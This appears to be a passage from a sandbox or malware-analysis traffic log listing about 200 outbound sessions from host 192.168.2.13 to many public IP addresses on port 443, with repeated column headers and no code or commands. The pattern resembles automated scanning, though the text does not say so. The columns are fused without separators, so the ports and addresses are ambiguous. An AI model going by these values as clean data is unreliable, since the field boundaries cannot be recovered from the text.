                                                  15592192.168.2.1343768211.191.253.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15593192.168.2.135878492.170.231.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15594192.168.2.1333804175.216.14.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15595192.168.2.1343046125.93.191.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15596192.168.2.1348668104.153.50.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15597192.168.2.1354096203.168.134.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15598192.168.2.1359182181.200.180.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15599192.168.2.1344714200.157.136.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15600192.168.2.1352294132.225.33.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15601192.168.2.1334402182.88.140.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15602192.168.2.1356556166.240.53.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15603192.168.2.1347908195.254.138.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15604192.168.2.135142835.153.203.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15605192.168.2.135807853.162.112.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15606192.168.2.1352190151.144.175.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15607192.168.2.134209642.172.13.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15608192.168.2.135090239.145.80.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15609192.168.2.1334630163.103.23.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15610192.168.2.1359492124.12.191.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15611192.168.2.13561408.109.121.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15612192.168.2.1341812162.42.148.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15613192.168.2.1345880172.98.63.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15614192.168.2.134031278.180.200.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15615192.168.2.135887458.108.65.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15616192.168.2.1341848113.192.161.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15617192.168.2.1352876144.41.42.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15618192.168.2.133933065.33.145.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15619192.168.2.1354808136.59.158.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15620192.168.2.134984847.80.243.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15621192.168.2.135041670.71.175.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15622192.168.2.134865489.55.191.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15623192.168.2.1345848177.35.226.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15624192.168.2.1334858194.147.180.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15625192.168.2.133675458.209.13.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15626192.168.2.1352048187.73.187.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15627192.168.2.134827639.1.108.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15628192.168.2.1341408211.147.102.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15629192.168.2.1351800115.204.167.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15630192.168.2.1353070135.144.104.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15631192.168.2.133375618.152.131.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15632192.168.2.1341280218.21.146.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15633192.168.2.133726457.232.124.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15634192.168.2.1347194153.137.193.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15635192.168.2.1335132125.198.31.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15636192.168.2.134193287.129.122.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15637192.168.2.133865819.84.87.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15638192.168.2.1354096143.57.46.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15639192.168.2.135640452.242.234.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15640192.168.2.1342026201.207.215.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15641192.168.2.1358252217.96.84.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15642192.168.2.1352998165.199.32.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15643192.168.2.1352600178.232.159.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15644192.168.2.134277071.122.89.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15645192.168.2.135480651.101.99.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15646192.168.2.134906027.181.75.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15647192.168.2.1355576176.94.229.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15648192.168.2.135866863.162.6.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15649192.168.2.135072888.101.133.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15650192.168.2.13593141.214.124.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15651192.168.2.1335530110.242.26.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15652192.168.2.1335660132.219.90.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15653192.168.2.1336264216.251.163.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15654192.168.2.1335448168.31.217.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15655192.168.2.13448564.45.198.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15656192.168.2.1333782175.31.117.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15657192.168.2.1338688201.214.128.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15658192.168.2.13565822.11.139.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15659192.168.2.135980693.46.126.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15660192.168.2.1352184180.20.199.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15661192.168.2.1338144153.105.167.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15662192.168.2.1338084208.131.234.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15663192.168.2.13523061.12.160.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15664192.168.2.1357624134.190.173.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15665192.168.2.1337322182.230.57.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15666192.168.2.135041267.50.213.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15667192.168.2.1340108195.208.90.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15668192.168.2.1334474156.167.177.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15669192.168.2.1350222175.206.158.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15670192.168.2.1344840137.249.146.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15671192.168.2.1340144110.179.178.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15672192.168.2.1355720171.130.66.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15673192.168.2.135586073.221.50.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15674192.168.2.1333532181.0.62.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15675192.168.2.133535092.132.216.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15676192.168.2.1348448149.43.120.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15677192.168.2.1333602163.58.40.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15678192.168.2.1344056190.225.84.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15679192.168.2.135721819.251.221.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15680192.168.2.135569070.141.161.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15681192.168.2.1341352202.172.222.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15682192.168.2.134297252.61.119.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15683192.168.2.1341170153.66.120.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15684192.168.2.13509009.85.40.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15685192.168.2.1333330183.60.21.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15686192.168.2.135579072.136.83.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15687192.168.2.1343746151.244.20.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15688192.168.2.1345926141.110.148.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15689192.168.2.1342774133.233.42.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15690192.168.2.1340450202.14.241.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15691192.168.2.134605241.72.135.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15692192.168.2.133429463.115.161.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15693192.168.2.135992475.20.145.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15694192.168.2.134970889.148.193.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15695192.168.2.1338366133.250.86.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15696192.168.2.1348880148.182.205.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15697192.168.2.1342472191.0.145.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15698192.168.2.1335816193.90.139.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15699192.168.2.1346668199.226.176.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15700192.168.2.1352088105.66.40.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15701192.168.2.1346292126.141.13.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15702192.168.2.1334774211.107.73.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15703192.168.2.1347072209.197.115.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15704192.168.2.134441270.22.178.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15705192.168.2.1336246180.185.180.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15706192.168.2.1334358146.92.70.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15707192.168.2.135246488.254.9.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15708192.168.2.1343064198.148.63.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15709192.168.2.1360450113.166.204.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15710192.168.2.133511277.88.198.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15711192.168.2.1359794181.207.243.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15712192.168.2.135636859.33.244.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15713192.168.2.134867092.190.108.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15714192.168.2.134262641.3.167.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15715192.168.2.133713037.61.242.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15716192.168.2.135782070.72.65.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15717192.168.2.134452479.0.38.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15718192.168.2.1358502143.221.29.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15719192.168.2.134265862.92.201.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15720192.168.2.1334730197.96.110.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15721192.168.2.1346480112.171.150.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15722192.168.2.1345294190.29.26.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15723192.168.2.135664666.189.148.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15724192.168.2.134563042.11.76.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15725192.168.2.1338434216.166.84.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15726192.168.2.1347946173.146.134.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15727192.168.2.1351344101.89.59.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15728192.168.2.13356729.189.143.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15729192.168.2.1343484174.101.92.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15730192.168.2.1340606193.73.81.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15731192.168.2.1339340166.23.206.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15732192.168.2.1334878122.123.181.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15733192.168.2.135037017.197.87.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15734192.168.2.1347208121.102.113.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15735192.168.2.1357014218.120.253.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15736192.168.2.1336896103.228.146.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15737192.168.2.135005413.32.0.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15738192.168.2.134407474.156.158.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15739192.168.2.1337794221.136.239.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15740192.168.2.1344950218.29.195.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15741192.168.2.133862660.237.102.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15742192.168.2.1353446203.234.227.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15743192.168.2.1347180182.140.220.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15744192.168.2.134590659.134.106.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15745192.168.2.1358884169.85.155.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15746192.168.2.134942471.101.104.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15747192.168.2.1340416208.102.37.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15748192.168.2.1340986156.182.24.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15749192.168.2.135453093.70.170.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15750192.168.2.13553141.179.252.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15751192.168.2.135978212.40.121.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15752192.168.2.133751465.23.211.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15753192.168.2.1349726132.43.180.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15754192.168.2.1348094179.80.197.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15755192.168.2.134791839.49.202.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15756192.168.2.133612020.56.71.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15757192.168.2.1351788134.116.71.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15758192.168.2.1339158210.38.109.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15759192.168.2.135928814.137.194.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15760192.168.2.1343988149.149.49.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15761192.168.2.135142898.255.141.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15762192.168.2.1355996165.29.243.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15763192.168.2.1333398152.108.21.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15764192.168.2.135987282.91.161.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15765192.168.2.1346862213.139.169.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15766192.168.2.1339394223.176.111.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15767192.168.2.1355278150.119.108.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15768192.168.2.135131036.242.50.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15769192.168.2.1352924161.81.104.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15770192.168.2.1351332181.228.160.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15771192.168.2.1357140110.144.10.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15772192.168.2.1344956187.53.105.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15773192.168.2.134136043.128.196.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15774192.168.2.1345492146.151.221.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15775192.168.2.1335914163.149.123.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15776192.168.2.1353888165.119.111.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15777192.168.2.135405423.207.199.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15778192.168.2.1355516148.171.187.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15779192.168.2.133476820.126.18.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15780192.168.2.133406451.144.86.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15781192.168.2.134206863.3.228.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15782192.168.2.1349308147.98.61.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15783192.168.2.1349312112.209.196.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15784192.168.2.133777853.1.236.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15785192.168.2.135473660.217.91.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15786192.168.2.135490462.195.219.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15787192.168.2.1334090103.5.114.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15788192.168.2.133407863.87.186.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15789192.168.2.1358930174.187.105.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15790192.168.2.1352152165.230.250.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15791192.168.2.1352814108.167.198.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15792192.168.2.1348284209.22.12.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15793192.168.2.1334040142.172.123.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15794192.168.2.135199619.86.63.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15795192.168.2.1348390213.10.88.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15796192.168.2.1348314198.147.0.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15797192.168.2.1349012154.131.159.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15798192.168.2.1334088159.243.138.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15799192.168.2.1334224138.66.219.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15800192.168.2.1343294130.170.184.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15801192.168.2.133524446.7.205.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15802192.168.2.1354540118.131.57.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15803192.168.2.1350682155.18.148.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15804192.168.2.133959218.105.160.242443
